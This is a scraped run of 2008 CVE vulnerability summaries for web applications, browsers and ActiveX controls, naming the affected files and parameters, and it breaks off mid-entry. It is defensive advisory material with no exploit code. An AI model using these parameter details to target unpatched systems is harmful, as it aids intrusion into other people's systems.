Hummingbird Xweb ActiveX Control 13.0 and earlier allows remote attackers to execute arbitrary code via a long PlainTextPassword property. NOTE: code execution might not be possible in 13.0. [CVE-2008-4727] Cross-site scripting (XSS) vulnerability in the contact update page (ss/bwgkoemr.P_UpdateEmrgContacts) in SunGard Banner Student 7.3 allows remote attackers to inject arbitrary web script or HTML via the addr1 parameter. NOTE: this might be resultant from a CSRF vulnerability, but there are insufficient details to be sure. [CVE-2008-4725] Cross-site scripting (XSS) vulnerability in Opera.dll in Opera 9.52 allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly escaped before storage in the History Search database (aka md.dat), a different vector than CVE-2008-4696. NOTE: some of these issues were addressed before 9.60. [CVE-2008-4724] Multiple cross-site scripting (XSS) vulnerabilities in Google Chrome 0.2.149.30 allow remote attackers to inject arbitrary web script or HTML via an ftp:// URL for an HTML document within a (1) JPG, (2) PDF, or (3) TXT file. NOTE: the provenance of this information is unknown [CVE-2008-4723] Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox 3.0.1 through 3.0.3 allow remote attackers to inject arbitrary web script or HTML via an ftp:// URL for an HTML document within a (1) JPG, (2) PDF, or (3) TXT file. NOTE: the provenance of this information is unknown [CVE-2008-4710] Cross-site scripting (XSS) vulnerability in the stock quotes page in Stock 6.x before 6.x-1.0, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4702] Multiple directory traversal vulnerabilities in PhpWebGallery 1.3.4 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) user[language] and (2) user[template] parameters to (a) init.inc.php, and (b) the user[language] parameter to isadmin.inc.php. [CVE-2008-4699] Insecure method vulnerability in the ActiveX control (PAWWeb11.ocx) in Peachtree Accounting 2004 allows remote attackers to execute arbitrary programs via the ExecutePreferredApplication method. [CVE-2008-4696] Cross-site scripting (XSS) vulnerability in Opera.dll in Opera before 9.61 allows remote attackers to inject arbitrary web script or HTML via the anchor identifier (aka the "optional fragment"), which is not properly escaped before storage in the History Search database (aka md.dat). [CVE-2008-4679] The Web Services Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.31 and 6.1 before 6.1.0.19, when Certificate Store Collections is configured to use Certificate Revocation Lists (CRL), does not call the setRevocationEnabled method on the PKIXBuilderParameters object, which prevents the "Java security method" from checking the revocation status of X.509 certificates and allows remote attackers to bypass intended access restrictions via a SOAP message with a revoked certificate. [CVE-2008-4678] The HTTP_Request_Parser method in the HTTP Transport component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.31 allows remote attackers to cause a denial of service (controller 0C4 abend and application hang) via a long HTTP Host header, related to "storage overlay" on the stack and a "parse failure." [CVE-2008-4673] PHP remote file inclusion vulnerability in panel/common/theme/default/header_setup.php in WebBiscuits Software Events Calendar 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the (1) path[docroot] and (2) component parameters. [CVE-2008-4672] Cross-site scripting (XSS) vulnerability in search_results.php in buymyscripts Lyrics Script allows remote attackers to inject arbitrary web script or HTML via the k parameter. NOTE: the provenance of this information is unknown [CVE-2008-4671] Cross-site scripting (XSS) vulnerability in wp-admin/wp-blogs.php in Wordpress MU (WPMU) before 2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) s and (2) ip_address parameters. [CVE-2008-4670] Cross-site scripting (XSS) vulnerability in search.php in Ed Pudol Clickbank Portal allows remote attackers to inject arbitrary web script or HTML via the search box. NOTE: the provenance of this information is unknown [CVE-2008-4669] Cross-site scripting (XSS) vulnerability in search.php in Dan Fletcher Recipe Script allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. NOTE: the provenance of this information is unknown [CVE-2008-4666] SQL injection vulnerability in webboard.php in Ultimate Webboard 3.00 allows remote attackers to execute arbitrary SQL commands via the Category parameter. [CVE-2008-4663] Cross-site scripting (XSS) vulnerability in analysis.cgi 1.44, as used in K's CGI Access Log Kaiseki (1) jcode.pl and (2) Jcode.pm, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4661] Cross-site scripting (XSS) vulnerability in the Page Improvements (sm_pageimprovements) 1.1.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4649] Session fixation vulnerability in Elxis CMS 2008.1 revision 2204 allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2008-4648] Cross-site scripting (XSS) vulnerability in index.php in Elxis CMS 2008.1 revision 2204 allows remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO or the (2) option, (3) Itemid, (4) id, (5) task, (6) bid, and (7) contact_id parameters. NOTE: the error might be located in modules/mod_language.php, and index.php might be the interaction point. [CVE-2008-4646] The Websense Reporter Module in Websense Enterprise 6.3.2 stores the SQL database system administrator password in plaintext in CreateDbInstall.log, which allows local users to gain privileges to the database. [CVE-2008-4645] plugins/event_tracer/event_list.php in PhpWebGallery 1.7.2 and earlier allows remote authenticated administrators to execute arbitrary PHP code via PHP sequences in the sort parameter, which is processed by create_function. [CVE-2008-4644] hits.php in myWebland myStats allows remote attackers to bypass IP address restrictions via a modified X-Forwarded-For HTTP header. [CVE-2008-4643] SQL injection vulnerability in hits.php in myWebland myStats allows remote attackers to execute arbitrary SQL commands via the sortby parameter. [CVE-2008-4637] Cross-site scripting (XSS) vulnerability in cpCommerce before 1.2.4 allows remote attackers to inject arbitrary web script or HTML via unknown vectors in the advanced search feature. NOTE: this is probably a variant of CVE-2008-4121. [CVE-2008-4634] Cross-site scripting (XSS) vulnerability in Movable Type 4 through 4.21 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the administrative page, a different vulnerability than CVE-2008-4079. [CVE-2008-4629] Cross-site scripting (XSS) vulnerability in Usagi Project MyNETS 1.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4628] SQL injection vulnerability in del.php in myWebland miniBloggie 1.0 allows remote attackers to execute arbitrary SQL commands via the post_id parameter. [CVE-2008-4612] Cross-site scripting (XSS) vulnerability in PortalApp 4.0 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter to (1) forums.asp and (2) content.asp. [CVE-2008-4601] Cross-site scripting (XSS) vulnerability in the login feature in Habari CMS 0.5.1 allows remote attackers to inject arbitrary web script or HTML via the habari_username parameter. [CVE-2008-4596] Cross-site scripting (XSS) vulnerability in Shindig-Integrator 5.x, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors in generated pages. [CVE-2008-4592] Directory traversal vulnerability in index.php in Sports Clubs Web Panel 0.0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the p parameter. [CVE-2008-4591] Multiple cross-site scripting (XSS) vulnerabilities in admin/include/isadmin.inc.php in PhpWebGallery 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) lang[access_forbiden] and (2) lang[ident_title] parameters. [CVE-2008-4586] Insecure method vulnerability in the MVSNCLientWebAgent61.WebAgent.1 ActiveX control (isusweb.dll 6.1.100.61372) in Macrovision FLEXnet Connect 6.1 allows remote attackers to force the download and execution of arbitrary files via the DownloadAndExecute method. [CVE-2008-4571] Cross-site scripting (XSS) vulnerability in the LiveSearch module in Plone before 3.0.4 allows remote attackers to inject arbitrary web script or HTML via the Description field for search results, as demonstrated using the onerror Javascript even in an IMG tag. [CVE-2008-4559] HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via shell metacharacters in argument fields to the (1) webappmon.exe or (2) OpenView5.exe CGI program. NOTE: this issue may be partially covered by CVE-2009-0205. [CVE-2008-4547] Heap-based buffer overflow in the PdvrAtl.PdvrOcx.1 ActiveX control (pdvratl.dll) in DVRHOST Web CMS OCX 1.0.1.25 allows remote attackers to execute arbitrary code via a long second argument to the TimeSpanFormat method. [CVE-2008-4546] Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows remote web servers to cause a denial of service (NULL pointer dereference and browser crash) by returning a different response when an HTTP request is sent a second time, as demonstrated by two responses that provide SWF files with different SWF version numbers. [CVE-2008-4542] Cross-site scripting (XSS) vulnerability in Cisco Unity 4.x before 4.2(1)ES162, 5.x before 5.0(1)ES56, and 7.x before 7.0(2)ES8 allows remote authenticated administrators to inject arbitrary web script or HTML by entering it in the database (aka data store). [CVE-2008-4541] Heap-based buffer overflow in the FTP subsystem in Sun Java System Web Proxy Server 4.0 through 4.0.7 allows remote attackers to execute arbitrary code via a crafted HTTP GET request. [CVE-2008-4537] Cross-site scripting (XSS) vulnerability in EC-CUBE Ver1 1.4.6 and earlier, Ver1 Beta 1.5.0-beta and earlier, Ver2 2.1.2a and earlier, Ver2 Beta(RC) 2.1.1-beta and earlier, Community Edition 1.3.4 and earlier, and Community Edition Nightly-Build r17336 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-4535 and CVE-2008-4536. [CVE-2008-4536] Cross-site scripting (XSS) vulnerability in EC-CUBE Ver1 1.4.6 and earlier, Ver1 Beta 1.5.0-beta and earlier, Ver2 2.1.2a and earlier, Ver2 Beta(RC) 2.2.0-beta and earlier, Community Edition 1.3.4 and earlier, and Community Edition Nightly-Build r17319 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-4535 and CVE-2008-4537. [CVE-2008-4535] Cross-site scripting (XSS) vulnerability in EC-CUBE Ver2 2.1.2a and earlier, EC-CUBE Ver2 Beta(RC) 2.2.0-beta and earlier, and EC-CUBE Community Edition Nighly-Build r17623 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-4536 and CVE-2008-4537. [CVE-2008-4533] Cross-site scripting (XSS) vulnerability in Kantan WEB Server 1.8 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-4532] Cross-site scripting (XSS) vulnerability in index.php in MaxiScript Website Directory allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a search action. [CVE-2008-4530] Cross-site scripting (XSS) vulnerability in Brilliant Gallery 5.x before 5.x-4.2, a module for Drupal, allows remote authenticated users with permissions to inject arbitrary web script or HTML via unspecified vectors related to posting of answers. [CVE-2008-4522] Multiple directory traversal vulnerabilities in JMweb MP3 Music Audio Search and Download Script allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the src parameter to (1) listen.php and (2) download.php. [CVE-2008-4520] Cross-site scripting (XSS) vulnerability in bulk_update.pl in AutoNessus before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the remark parameter. [CVE-2008-4515] Blue Coat K9 Web Protection 4.0.230 Beta relies on client-side JavaScript as a protection mechanism, which allows remote attackers to bypass authentication and access the (1) summary, (2) detail, (3) overrides, and (4) pwemail pages by disabling JavaScript. [CVE-2008-4513] Cross-site scripting (XSS) vulnerability in BBcode API module in Phorum 5.2.8 allows remote attackers to inject arbitrary web script or HTML via nested BBcode image tags. [CVE-2008-4512] ASP/MS Access Shoutbox, probably 1.1 beta, stores db/shoutdb.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request. [CVE-2008-4511] Todd Woolums ASP News Management, possibly 2.21, stores db/news.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request. [CVE-2008-4499] Multiple directory traversal vulnerabilities in PHP Web Explorer 0.99b and earlier allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) refer parameter to main.php and the (2) file parameter to edit.php. [CVE-2008-4488] Cross-site scripting (XSS) vulnerability in ap-pages.php in Atarone CMS 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) id parameters. NOTE: the provenance of this information is unknown [CVE-2008-4485] Cross-site scripting (XSS) vulnerability in the ICAP patience page in Blue Coat Security Gateway OS (SGOS) 4.2 before 4.2.9, 5.2 before 5.2.5, and 5.3 before 5.3.1.7 allows remote attackers to inject arbitrary web script or HTML via the URL. [CVE-2008-4481] Cross-site scripting (XSS) vulnerability in Redmine 0.7.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4456] Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, and other versions including versions later than 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document. NOTE: as of 20081031, the issue has not been fixed in MySQL 5.0.67. [CVE-2008-4450] Cross-site scripting (XSS) vulnerability in adodb.php in XAMPP for Windows 1.6.8 allows remote attackers to inject arbitrary web script or HTML via the (1) dbserver, (2) host, (3) user, (4) password, (5) database, and (6) table parameters. NOTE: the provenance of this information is unknown [CVE-2008-4448] Cross-site request forgery (CSRF) vulnerability in actions.php in Positive Software H-Sphere WebShell 4.3.10 allows remote attackers to perform unauthorized actions as an administrator, including file deletion and creation, via a link or IMG tag to the (1) overkill, (2) futils, or (3) edit actions. [CVE-2008-4447] Cross-site scripting (XSS) vulnerability in actions.php in Positive Software H-Sphere WebShell 4.3.10 allows remote attackers to inject arbitrary web script or HTML via (1) the fn parameter during a dload action, (2) the mask parameter during a search action, and (3) the tab parameter during a sysinfo action. [CVE-2008-4446] Cross-site scripting (XSS) vulnerability in Nucleus EUC-JP 3.31 SP1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4438] Cross-site scripting (XSS) vulnerability in search.php in Datafeed Studio 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: the provenance of this information is unknown [CVE-2008-4435] Multiple cross-site scripting (XSS) vulnerabilities in the RMSOFT Downloads Plus (rmdp) module 1.5 and 1.7 for Xoops allow remote attackers to inject arbitrary web script or HTML via the (1) key parameter to search.php and the (2) id parameter to down.php. [CVE-2008-4432] Cross-site scripting (XSS) vulnerability in search.php in the RMSOFT MiniShop module 1.0 for Xoops allows remote attackers to inject arbitrary web script or HTML via the itemsxpag parameter. [CVE-2008-4426] Cross-site scripting (XSS) vulnerability in events.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to inject arbitrary web script or HTML via the date parameter in a new action. [CVE-2008-4424] Cross-site scripting (XSS) vulnerability in index.php in Domain Group Network GooCMS 1.02 allows remote attackers to inject arbitrary web script or HTML via the s parameter in a comments action. NOTE: the provenance of this information is unknown [CVE-2008-4411] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.15.210 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-1663. [CVE-2008-4410] The vmi_write_ldt_entry function in arch/x86/kernel/vmi_32.c in the Virtual Machine Interface (VMI) in the Linux kernel 2.6.26.5 invokes write_idt_entry where write_ldt_entry was intended, which allows local users to cause a denial of service (persistent application failure) via crafted function calls, related to the Java Runtime Environment (JRE) experiencing improper LDT selector state, a different vulnerability than CVE-2008-3247. [CVE-2008-4408] Cross-site scripting (XSS) vulnerability in MediaWiki 1.13.1, 1.12.0, and possibly other versions before 1.13.2 allows remote attackers to inject arbitrary web script or HTML via the useskin parameter to an unspecified component. [CVE-2008-4397] Directory traversal vulnerability in the RPC interface (asdbapi.dll) in CA ARCserve Backup (formerly BrightStor ARCserve Backup) r11.1 through r12.0 allows remote attackers to execute arbitrary commands via a .. (dot dot) in an RPC call with opnum 0x10A. [CVE-2008-4393] Cross-site scripting (XSS) vulnerability in VeriSign Kontiki Delivery Management System (DMS) 5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the action parameter to zodiac/servlet/zodiac. [CVE-2008-4391] Stack-based buffer overflow in the SetSource method in the NetCamPlayerWeb11gv2 ActiveX control in NetCamPlayerWeb11gv2.ocx on the Cisco Linksys WVC54GC wireless video camera before firmware 1.25 allows remote attackers to execute arbitrary code via long invalid arguments. [CVE-2008-4385] Husdawg, LLC Systems Requirements Lab 3, as used by Instant Expert Analysis, allows remote attackers to force the download and execution of arbitrary programs via by specifiying a malicious website argument to the Init method in (1) a certain ActiveX control (sysreqlab2.cab, sysreqlab.dll, sysreqlabsli.dll, or sysreqlab2.dll) and (2) a certain Java applet in RLApplet.class in sysreqlab2.jar or sysreqlab.jar. [CVE-2008-4383] Stack-based buffer overflow in the Agranet-Emweb embedded management web server in Alcatel OmniSwitch OS7000, OS6600, OS6800, OS6850, and OS9000 Series devices with AoS 5.1 before 5.1.6.463.R02, 5.4 before 5.4.1.429.R01, 6.1.3 before 6.1.3.965.R01, 6.1.5 before 6.1.5.595.R01, and 6.3 before 6.3.1.966.R01 allows remote attackers to execute arbitrary code via a long Session cookie. [CVE-2008-4379] Cross-site scripting (XSS) vulnerability in report.php in Mr. CGI Guy Hot Links SQL-PHP 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2008-4372] Cross-site scripting (XSS) vulnerability in articles.php in AvailScript Article Script allows remote attackers to inject arbitrary web script or HTML via the aIDS parameter. [CVE-2008-4370] Multiple cross-site scripting (XSS) vulnerabilities in Availscript Photo Album allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to pics.php and the (2) a parameter to view.php. [CVE-2008-4365] Cross-site scripting (XSS) vulnerability in search.php in Siteman 1.1.11 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown [CVE-2008-4364] SQL injection vulnerability in default.aspx in ParsaGostar ParsaWeb CMS allows remote attackers to execute arbitrary SQL commands via the (1) id parameter in the "page" page and (2) txtSearch parameter in the "Search" page. [CVE-2008-4349] Multiple cross-site scripting (XSS) vulnerabilities in news.php in s0nic Paranews 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) id or (2) page parameter in a details action. [CVE-2008-4345] SQL injection vulnerability in download.php in WebPortal CMS 0.7.4 and earlier allows remote attackers to execute arbitrary SQL commands via the aid parameter. [CVE-2008-4337] Cross-site scripting (XSS) vulnerability in Bitweaver 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the URL parameter to (1) edit.php and (2) list.php in articles/ [CVE-2008-4336] Cross-site scripting (XSS) vulnerability in album.php in Atomic Photo Album (APA) 1.1.0pre4 allows remote attackers to inject arbitrary web script or HTML via the apa_album_ID parameter. [CVE-2008-4333] Cross-site scripting (XSS) vulnerability in PHP infoBoard V.7 Plus allows remote attackers to inject arbitrary web script or HTML via the isname parameter in a newtopic action. [CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237. [CVE-2008-4324] The user interface event dispatcher in Mozilla Firefox 3.0.3 on Windows XP SP2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a series of keypress, click, onkeydown, onkeyup, onmousedown, and onmouseup events. NOTE: it was later reported that Firefox 3.0.2 on Mac OS X 10.5 is also affected. [CVE-2008-4320] Multiple cross-site scripting (XSS) vulnerabilities in OpenNMS before 1.5.94 allow remote attackers to inject arbitrary web script or HTML via (1) the j_username parameter to j_acegi_security_check, (2) the username parameter to notification/list.jsp, and (3) the filter parameter to event/list. [CVE-2008-4310] httputils.rb in WEBrick in Ruby 1.8.1 and 1.8.5, as used in Red Hat Enterprise Linux 4 and 5, allows remote attackers to cause a denial of service (CPU consumption) via a crafted HTTP request. NOTE: this issue exists because of an incomplete fix for CVE-2008-3656. [CVE-2008-4297] Mercurial before 1.0.2 does not enforce the allowpull permission setting for a pull operation from hgweb, which allows remote attackers to read arbitrary files from a repository via an "hg pull" request. [CVE-2008-4294] IBM Tivoli Netcool/Webtop 2.1 before 2.1.0.5 preserves cached user privileges after logout, which allows physically proximate attackers to hijack a session by visiting an unattended workstation, as demonstrated by a root session that is still valid after a subsequent read-only session has begun. [CVE-2008-4285] Unspecified vulnerability in the Performance Monitoring Infrastructure (PMI) feature in the Servlet Engine/Web Container component in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.19, when a component statistic is enabled, allows attackers to cause a denial of service (daemon crash) via vectors related to "a gradual degradation in performance." [CVE-2008-4284] Open redirect vulnerability in the ibm_security_logout servlet in IBM WebSphere Application Server (WAS) 5.1.1.19 and earlier 5.x versions, 6.0.x before 6.0.2.33, and 6.1.x before 6.1.0.23 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the logoutExitPage feature. [CVE-2008-4283] CRLF injection vulnerability in the WebContainer component in IBM WebSphere Application Server (WAS) 5.1.1.19 and earlier 5.1.x versions allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors. [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4259] Microsoft Internet Explorer 7 sometimes attempts to access uninitialized memory locations, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, related to a WebDAV request for a file with a long name, aka "HTML Objects Memory Corruption Vulnerability." [CVE-2008-4247] ftpd in OpenBSD 4.3, FreeBSD 7.0, NetBSD 4.0, Solaris, and possibly other operating systems interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser. [CVE-2008-4243] Directory traversal vulnerability in ImageServer (aka UTImageServer) in WebAdmin before 1.7 for Epic Games Unreal Tournament 3 (UT3) 1.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser. [CVE-2008-4232] Safari in Apple iPhone OS 2.0 through 2.1 and iPhone OS for iPod touch 2.1 through 2.1 does not restrict an IFRAME's content display to the boundaries of the IFRAME, which allows remote attackers to spoof a user interface via a crafted HTML document. [CVE-2008-4215] Weblog in Mac OS X Server 10.4.11 does not properly check an error condition when a weblog posting access control list is specified for a user that has multiple short names, which might allow attackers to bypass intended access restrictions. [CVE-2008-4200] Opera before 9.52 does not ensure that the address field of a news feed represents the feed's actual URL, which allows remote attackers to change this field to display the URL of a page containing web script controlled by the attacker. [CVE-2008-4199] Opera before 9.52 does not prevent use of links from web pages to feed source files on the local disk, which might allow remote attackers to determine the validity of local filenames via vectors involving "detection of JavaScript events and appropriate manipulation." [CVE-2008-4196] Cross-site scripting (XSS) vulnerability in Opera before 9.52 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4195] Opera before 9.52 does not properly restrict the ability of a framed web page to change the address associated with a different frame, which allows remote attackers to trigger the display of an arbitrary address in a frame via unspecified use of web script. [CVE-2008-4186] SQL injection vulnerability in index.php in webCMS Portal Edition allows remote attackers to execute arbitrary SQL commands via the id_doc parameter. NOTE: the provenance of this information is unknown [CVE-2008-4185] SQL injection vulnerability in index.php in webCMS Portal Edition allows remote attackers to execute arbitrary SQL commands via the id parameter in a documentos action, a different vector than CVE-2008-3213. [CVE-2008-4184] Cross-site scripting (XSS) vulnerability in index.php in webCMS Portal Edition allows remote attackers to inject arbitrary web script or HTML via the patron parameter. NOTE: the provenance of this information is unknown [CVE-2008-4183] IntegraMOD 1.4.x stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a backup via a direct request to a backup/backup-yyyy-dd-mm.sql filename. [CVE-2008-4182] Cross-site scripting (XSS) vulnerability in imp/test.php in Horde Turba Contact Manager H3 2.2.1 and other versions before 2.3.1, and possibly other Horde Project products, allows remote attackers to inject arbitrary web script or HTML via the User field in an IMAP session. [CVE-2008-4179] Multiple cross-site scripting (XSS) vulnerabilities in NooMS 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) page_id parameter to smileys.php and the (2) q parameter to search.php. [CVE-2008-4174] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Dynamic MP3 Lister 2.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) currentpath, (2) invert, (3) search, and (4) sort parameters. [CVE-2008-4168] Cross-site scripting (XSS) vulnerability in verify_login.jsp in Pro2col Stingray FTS allows remote attackers to inject arbitrary web script or HTML via the form_username parameter (aka user name field). [CVE-2008-4162] Open redirect vulnerability in admin/auth.php in NooMS 1.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the g_site_url parameter. [CVE-2008-4154] SQL injection vulnerability in living-e webEdition CMS allows remote attackers to execute arbitrary SQL commands via the we_objectID parameter. [CVE-2008-4152] Cross-site scripting (XSS) vulnerability in the Talk module 5.x before 5.x-1.3 and 6.x before 6.x-1.5, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via a node title. [CVE-2008-4149] Cross-site scripting (XSS) vulnerability in the Greg Holsclaw Link to Us module 5.x before 5.x-1.1 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via the "Link page header" field. [CVE-2008-4147] Cross-site scripting (XSS) vulnerability in the Mailsave module 5.x before 5.x-3.3 and 6.x before 6.x-1.3, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an attached file that has a modified Content-Type. [CVE-2008-4146] Addalink 1.0 beta 4 and earlier allows remote attackers to (1) approve web-site additions via a modified approved field and (2) change the visit-counter value via a modified counter field. [CVE-2008-4141] Multiple PHP remote file inclusion vulnerabilities in x10Media x10 Automatic MP3 Script 1.5.5 allow remote attackers to execute arbitrary PHP code via a URL in the web_root parameter to (1) includes/function_core.php and (2) templates/layout_lyrics.php. [CVE-2008-4140] Cross-site scripting (XSS) vulnerability in admin.php in Quick.Cart 3.1 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2008-4139] Cross-site scripting (XSS) vulnerability in admin.php in OpenSolution Quick.Cms.Lite 2.1 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2008-4133] The web proxy service on the D-Link DIR-100 with firmware 1.12 and earlier does not properly filter web requests with large URLs, which allows remote attackers to bypass web restriction filters. [CVE-2008-4130] Cross-site scripting (XSS) vulnerability in Gallery 2.x before 2.2.6 allows remote attackers to inject arbitrary web script or HTML via a crafted Flash animation, related to the ability of the animation to "interact with the embedding page." [CVE-2008-4121] Multiple cross-site scripting (XSS) vulnerabilities in cpCommerce before 1.2.4 allow remote attackers to inject arbitrary web script or HTML via (1) the search parameter in a search.quick action to search.php and (2) the name parameter in a sendtofriend action to sendtofriend.php. [CVE-2008-4120] Multiple cross-site scripting (XSS) vulnerabilities in FlatPress 0.804 allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) pass parameter to login.php, or the (3) name parameter to contact.php. [CVE-2008-4119] Multiple cross-site scripting (XSS) vulnerabilities in CA Service Desk 11.2 and CMDB 11.0 through 11.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "multiple web forms." [CVE-2008-4118] Cross-site scripting (XSS) vulnerability in High Norm Sound Master 2nd 1.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-4117] Unspecified vulnerability in a web page in the PRM module in Sun Management Center (SunMC) 3.6.1 and 4.0 allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors. [CVE-2008-4116] Buffer overflow in Apple QuickTime 7.5.5 and iTunes 8.0 allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a long type attribute in a quicktime tag (1) on a web page or embedded in a (2) .mp4 or (3) .mov file, possibly related to the Check_stack_cookie function and an off-by-one error that leads to a heap-based buffer overflow. [CVE-2008-4111] Unspecified vulnerability in Servlet Engine/Web Container in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.31 and 6.1 before 6.1.0.19, when the FileServing feature is enabled, has unknown impact and attack vectors. [CVE-2008-4104] Multiple open redirect vulnerabilities in Joomla! 1.5 before 1.5.7 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a "passed in" URL. [CVE-2008-4096] libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function. [CVE-2008-4091] SQL injection vulnerability in index.php in Web Directory Script 1.5.3 allows remote attackers to execute arbitrary SQL commands via the site parameter in an open action. [CVE-2008-4089] Cross-site scripting (XSS) vulnerability in print.php in myPHPNuke (MPN) before 1.8.8_8rc2 allows remote attackers to inject arbitrary web script or HTML via the sid parameter. [CVE-2008-4083] Cross-site scripting (XSS) vulnerability in the Bookmarks plugin in Brim 2.0 allows remote authenticated users to inject arbitrary web script or HTML via the name parameter in an addItemPost action to index.php. NOTE: some of these details are obtained from third party information. [CVE-2008-4076] Cross-site scripting (XSS) vulnerability in (1) Tor World Tor Board 1.3 and earlier, (2) Topics BBS 1.11 and earlier, (3) Simple BBS 1.86 and earlier, and (4) Interactive BBS 1.57 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-0917. [CVE-2008-4056] Cross-site scripting (XSS) vulnerability in admin/login.php in Matterdaddy Market 1.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the provenance of this information is unknown [CVE-2008-4053] Multiple cross-site scripting (XSS) vulnerabilities in index.php in the Bluemoon PopnupBLOG module 3.20 and 3.30 for XOOPS allow remote attackers to inject arbitrary web script or HTML via the (1) param, (2) cat_id, and (3) view parameters. [CVE-2008-4051] Cross-site scripting (XSS) vulnerability in surveyresults.asp in Smart Survey 1.0 allows remote attackers to inject arbitrary web script or HTML via the sid parameter. NOTE: the provenance of this information is unknown [CVE-2008-4045] Multiple 